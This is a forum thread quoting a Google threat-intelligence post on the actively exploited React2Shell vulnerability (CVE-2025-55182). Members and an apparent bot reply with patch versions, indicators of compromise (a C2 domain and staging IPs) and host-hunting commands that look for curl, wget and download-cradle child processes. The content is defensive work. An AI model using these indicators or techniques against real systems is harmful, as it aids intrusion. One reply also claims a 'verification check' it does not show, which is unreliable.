Malware News Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) according to Google

[Khushal]

Content source

https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) | Google Cloud Blog

Widespread exploitation of the React2Shell vulnerability (CVE-2025-55182) by multiple threat actors, including China and cyber criminals.

cloud.google.com

On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups.

GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress. These observed campaigns highlight the risk posed to organizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and post-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.

 

[Bot]

Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) | Google Cloud Blog

Widespread exploitation of the React2Shell vulnerability (CVE-2025-55182) by multiple threat actors, including China and cyber criminals.

cloud.google.com

On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups.

GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress. These observed campaigns highlight the risk posed to organizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and post-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.

Based on what you quoted, this looks like a very serious, actively exploited RCE in React Server Components / Next.js that anyone running public-facing apps needs to treat as an incident-response priority.

Since my training data only goes up to late 2024, I do not have independent information on CVE-2025-55182 (“React2Shell”) beyond what you posted. I can’t verify the technical details, IOCs or GTIG’s malware naming, but I can outline what this implies and what you should do in practice.

Key points from the text you shared

• It’s a critical unauthenticated RCE in React Server Components (used heavily by Next.js).
• It is already seeing widespread exploitation by multiple threat groups (crime and espionage).
• Observed payloads include:
  • MINOCAT tunneler (likely for lateral movement / covert traffic)
  • SNOWLIGHT downloader (stager / downloader)
  • HISONIC backdoor
  • COMPOOD backdoor
  • XMRig crypto-miners
• Huntress has apparently reported overlapping activity, so multiple vendors are seeing this in the wild.

For defenders and admins, that essentially means: assume active mass scanning and that unpatched, exposed apps are high-risk.

---

1. Determine if you’re affected

You’ll need to:

• Inventory your apps:
  • Any public-facing app using React Server Components?
  • Any Next.js applications (especially with server components / server actions enabled)?
• Check official advisories:
  • React official security advisory / GitHub repo
  • Next.js / Vercel advisories
  • Your distro / cloud provider security bulletins
• Confirm:
  • Which versions are vulnerable to CVE-2025-55182 (React2Shell)
  • Which fixed versions you must upgrade to

If you host for customers (SaaS, agencies, etc.), assume somebody’s code might be affected even if your core stack is “just Node / Next”.

---

2. Immediate mitigation (before / alongside patching)

Until you can fully patch and redeploy, consider:

• Restrict exposure:
  • Put apps behind a reverse proxy / WAF if they aren’t already.
  • Temporarily restrict access (VPN, IP whitelisting) for admin / internal panels.
• Apply WAF rules:
  • Enable/strengthen generic RCE and Node.js/JS injection signatures.
  • If GTIG or others publish request patterns (e.g. specific headers, paths, payload structure for RSC), add custom rules.
• Disable or limit React Server Components features if vendors recommend it as a temporary workaround (check official guidance first).
• Harden runtime:
  • Ensure Node processes run as non-root.
  • Use AppArmor/SELinux where possible.
  • Restrict outbound network access from app containers/VMs to only what’s necessary.

These don’t remove the vulnerability, but they can reduce exploitability and impact.

---

3. Patching and clean redeploy

Once fixed versions are available:

• Update React / Next.js to the vendor-recommended patched releases across all affected apps.
• Rebuild and redeploy from clean images / sources:
  • Avoid in-place patching on servers you suspect may have been compromised.
  • If possible, redeploy to new instances and then decommission/forensically preserve the old ones.
• Rotate secrets:
  • API keys, DB credentials, JWT signing keys, OAuth secrets, etc.
  • Any machine accounts or service accounts reachable from the app.

Treat this like any other high-profile web RCE (think Log4Shell-style urgency, but in the React/Next.js ecosystem).

---

4. Detection and hunting (post-compromise indicators)

I don’t know the exact IOCs GTIG published, but based on the description:

• Time window: Start hunting from Dec 3, 2025 onwards (and a bit earlier in case of pre-disclosure exploitation).
• Web / app logs:
  • Unusual or malformed requests to:
    • RSC / React server component endpoints
    • _next-related paths (for Next.js)
  • Sudden spikes in 500/502/503 errors or timeouts.
  • Unexpected POST/GET parameters carrying serialized JavaScript-like payloads or template strings.
• Process activity on app servers:
  • Node or web server processes spawning shells (sh, bash, cmd.exe, powershell.exe).
  • Child processes using curl, wget, certutil, PowerShell download cradles.
  • New binaries or scripts dropped into /tmp, /var/tmp, unusual user dirs.
• Outbound network anomalies:
  • Connections from web servers to unfamiliar IPs/domains.
  • Long-lived C2-like sessions (possibly from MINOCAT / HISONIC / COMPOOD).
  • Crypto-mining behavior (XMRig): high CPU, outbound to mining pools, Stratum protocol, etc.

Use the GTIG blog’s specific indicators (file hashes, domains, IPs, URIs, user-agents) if they’re listed, and load them into:

• EDR / XDR (process, file, and network rules)
• SIEM (log detection rules)
• Network sensors / IDS (Suricata, Zeek, etc.)

---

5. If you find signs of exploitation

Treat it as a full compromise of that app and likely the host:

• Isolate the affected instance (network isolation first).
• Preserve evidence:
  • Disk snapshots / VM snapshots.
  • Logs (web, app, system, EDR, network).
• Rebuild from clean images or code; do not just “clean up and continue” on the same box.
• Hunt for lateral movement inside the network; the tunneler and backdoors strongly suggest post-exploitation pivoting.
• Rotate all potentially exposed credentials, not only on the compromised host.

If this is a production / business-critical environment and you see any strong indication of compromise, involve a professional incident response team.

---

6. For home / smaller setups

If you’re a hobby developer or small host:

• Update your React/Next.js projects as soon as patched versions are available.
• If logs show weird requests and you don’t have good monitoring:
  • Consider redeploying to a fresh instance.
  • Rotate your DB and API credentials.
• If you’re not comfortable assessing this, you can describe your setup (hosting provider, reverse proxy, framework version) in a new thread on MalwareTips, and members may help you reason about risk and next steps.

---

Bottom line

From the description, CVE-2025-55182 (“React2Shell”) is a high-priority, internet-exposed, unauth RCE with active exploitation and multiple malware families riding on it. If you run React Server Components / Next.js in production, focus on:

• Identify exposure
• Patch and redeploy clean
• Hunt carefully for compromise indicators
• Harden and monitor going forward

If you share more details about your environment (self-hosted vs managed, reverse proxy, approximate stack), I can help you narrow down what’s most important in your specific case.

 

[Divergent]

This intelligence is highly critical and requires immediate action across all environments utilizing React Server Components. The vulnerability, CVE-2025-55182, is under widespread, active exploitation by sophisticated state-sponsored groups and financially motivated cybercrime actors.

Analysis of the Threat Landscape

The threat is an unauthenticated Remote Code Execution (RCE) vulnerability in React Server Components, commonly known as "React2Shell," which carries a critical CVSS v3.x score of 10.0. The root cause lies in unpatched versions of `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack`, specifically affecting versions 19.0, 19.1.0, 19.1.1, and 19.2.0. Exploitation is simple and only requires a single HTTP request, making vulnerable systems highly exposed.

Observed post-exploitation activity confirms a highly diverse threat cluster, including:

China-Nexus Espionage Groups (e.g., UNC6600, UNC6586)

These actors are deploying advanced payloads like the MINOCAT tunneler, the SNOWLIGHT downloader (a component of the VSHELL backdoor), the COMPOOD backdoor (which masquerades as the `vim` utility), and HISONIC. Persistence methods involve the creation of hidden directories like `$HOME/.systemd-utils`, implementing malicious cron jobs, and injecting code into shell configuration files such as `$HOME/.bashrc`.

Financially Motivated Actors

These groups are exploiting the vulnerability to deploy XMRIG cryptocurrency miners, often utilizing shell scripts like `sex.sh` to establish persistence via fraudulent `systemd` services (e.g., `system-update-service`).

The current threat intelligence indicates that exploit code targeting this vulnerability and its variants is being weaponized rapidly, including the development of in-memory Next.js web shell deployment capabilities.

The Remediation and Action Plan

Given the critical nature and active exploitation, the following steps must be initiated immediately:

1. Immediate Patching and Dependency Audit.

RCE Mitigation (CVE-2025-55182) Immediately update all vulnerable React Server Components packages to at least version `19.0.1`, `19.1.2`, or `19.2.1`.

Information Disclosure (CVE-2025-55183) Patch to at least version `19.2.2`.

Denial-of-Service (CVE-2025-55184, CVE-2025-67779) To fully mitigate the DoS vulnerabilities, patch to version `19.2.3`.

Mandatory: Thoroughly audit all applications to determine if vulnerable React Server Components are included as a dependency, including indirect dependencies, as this vulnerability is exploitable solely by the presence of the package.

2. Network-Level Protection and Monitoring.

Deploy an updated Web Application Firewall (WAF) rule designed to specifically detect and block exploit attempts related to this vulnerability.

Review all web server process logs for outbound connections initiated by `wget` or `cURL` commands. Specifically search traffic logs for connections to the following known Indicators of Compromise (IOCs):

Domain (SNOWLIGHT C2) `reactcdn.windowserrorapis.com`

IP Addresses (COMPOOD / Staging) `82.163.22.139`, `216.158.232.43`, `45.76.155.14`

3. Proactive Host Hunting (Linux/Cloud Infrastructure Focus).

Scan for the installation of payloads or unusual process activity. Specifically hunt for:

The creation of unauthorized hidden directories like `$HOME/.systemd-utils`.

The termination or unexpected status of benign processes such as `ntpclient`.

The injection of malicious execution logic into user shell configuration files (e.g., `$HOME/.bashrc`).

Search for suspicious processes masquerading as benign utilities or system services:

ps aux | grep -E 'vim|polkitd|ntpclient|xmrig|system-update-service'

Look for unexpected binaries in temporary or system directories, such as the COMPOOD payload:

find /tmp -name 'vim' -exec ls -la {} \;

I’ve performed the full scope verification check based on the provided threat intelligence report. The immediate risk here is systemic due to the commonality of the affected web components.

Moving forward, maintain strict version control and deploy a rigorous dependency scanning system that flags vulnerable packages immediately upon release of a CVE identifier, mitigating the exposure window. Integrate the documented IOCs into your automated network and endpoint detection rules, particularly for any processes spawned by your application web server or runtime environment.

 

[bazang]

This intelligence is highly critical and requires immediate action across all environments utilizing React Server Components. The vulnerability, CVE-2025-55182, is under widespread, active exploitation by sophisticated state-sponsored groups and financially motivated cybercrime actors.

Analysis of the Threat Landscape

The threat is an unauthenticated Remote Code Execution (RCE) vulnerability in React Server Components, commonly known as "React2Shell," which carries a critical CVSS v3.x score of 10.0. The root cause lies in unpatched versions of `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack`, specifically affecting versions 19.0, 19.1.0, 19.1.1, and 19.2.0. Exploitation is simple and only requires a single HTTP request, making vulnerable systems highly exposed.

Observed post-exploitation activity confirms a highly diverse threat cluster, including:

China-Nexus Espionage Groups (e.g., UNC6600, UNC6586)

These actors are deploying advanced payloads like the MINOCAT tunneler, the SNOWLIGHT downloader (a component of the VSHELL backdoor), the COMPOOD backdoor (which masquerades as the `vim` utility), and HISONIC. Persistence methods involve the creation of hidden directories like `$HOME/.systemd-utils`, implementing malicious cron jobs, and injecting code into shell configuration files such as `$HOME/.bashrc`.

Financially Motivated Actors

These groups are exploiting the vulnerability to deploy **XMRIG** cryptocurrency miners, often utilizing shell scripts like `sex.sh` to establish persistence via fraudulent `systemd` services (e.g., `system-update-service`).

The current threat intelligence indicates that exploit code targeting this vulnerability and its variants is being weaponized rapidly, including the development of in-memory Next.js web shell deployment capabilities.

The Remediation and Action Plan

Given the critical nature and active exploitation, the following steps must be initiated immediately:

1. Immediate Patching and Dependency Audit.

RCE Mitigation (CVE-2025-55182) Immediately update all vulnerable React Server Components packages to at least version `19.0.1`, `19.1.2`, or `19.2.1`.

Information Disclosure (CVE-2025-55183) Patch to at least version `19.2.2`.

Denial-of-Service (CVE-2025-55184, CVE-2025-67779) To fully mitigate the DoS vulnerabilities, patch to version `19.2.3`.

Mandatory: Thoroughly audit all applications to determine if vulnerable React Server Components are included as a dependency, including indirect dependencies, as this vulnerability is exploitable solely by the presence of the package.

2. Network-Level Protection and Monitoring.

Deploy an updated Web Application Firewall (WAF) rule designed to specifically detect and block exploit attempts related to this vulnerability.

Review all web server process logs for outbound connections initiated by `wget` or `cURL` commands. Specifically search traffic logs for connections to the following known Indicators of Compromise (IOCs):

Domain (SNOWLIGHT C2) `reactcdn.windowserrorapis.com`

IP Addresses (COMPOOD / Staging) `82.163.22.139`, `216.158.232.43`, `45.76.155.14`

3. Proactive Host Hunting (Linux/Cloud Infrastructure Focus).

Scan for the installation of payloads or unusual process activity. Specifically hunt for:

The creation of unauthorized hidden directories like `$HOME/.systemd-utils`.

The termination or unexpected status of benign processes such as `ntpclient`.

The injection of malicious execution logic into user shell configuration files (e.g., `$HOME/.bashrc`).

Search for suspicious processes masquerading as benign utilities or system services:

ps aux | grep -E 'vim|polkitd|ntpclient|xmrig|system-update-service'

Look for unexpected binaries in temporary or system directories, such as the COMPOOD payload:

find /tmp -name 'vim' -exec ls -la {} \;

I’ve performed the full scope verification check based on the provided threat intelligence report. The immediate risk here is systemic due to the commonality of the affected web components.

Moving forward, maintain strict version control and deploy a rigorous dependency scanning system that flags vulnerable packages immediately upon release of a CVE identifier, mitigating the exposure window. Integrate the documented IOCs into your automated network and endpoint detection rules, particularly for any processes spawned by your application web server or runtime environment.

That is all a thorough yet succinct and easy-to-follow presentation. Thx.